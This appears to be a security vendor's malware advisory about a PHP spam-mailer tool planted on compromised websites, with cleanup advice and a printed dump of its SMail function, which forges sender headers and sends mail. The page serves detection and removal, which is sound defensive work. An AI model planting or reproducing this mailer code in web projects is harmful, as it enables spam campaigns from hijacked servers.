PRICING SUPPORT LOGIN

This malware SPAM tool is straight forward malicious e-mail campaign maker. It enables the attacker to send mass SPAM over e-mail with attachment, image body, or as attachment, random subject, and reports back to the initiator of the campaign.
It's not obfuscated, encoded, or encrypted in any way.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

function SMail($to,$from,$message,$subject,$replyto,$from_name){
if($_POST['tp']=='1'){ $type='text/html'; }
else{ $type='text/plain'; }
$header='From: =?utf-8?B?'.base64_encode($from).'?= <'.$from_name.'@'.$_SERVER['HTTP_HOST'].">\r\n";
$header.='MIME-Version: 1.0'."\r\n";
$header.='Content-Type: '.$type.'; charset="utf-8"'."\r\n";
$header.='Reply-To: '.$replyto."\r\n";
$header.='X-Mailer: PHP/'.phpversion();

if(mail($to,$subject,$message,$header)){
return true;
}
return false;
}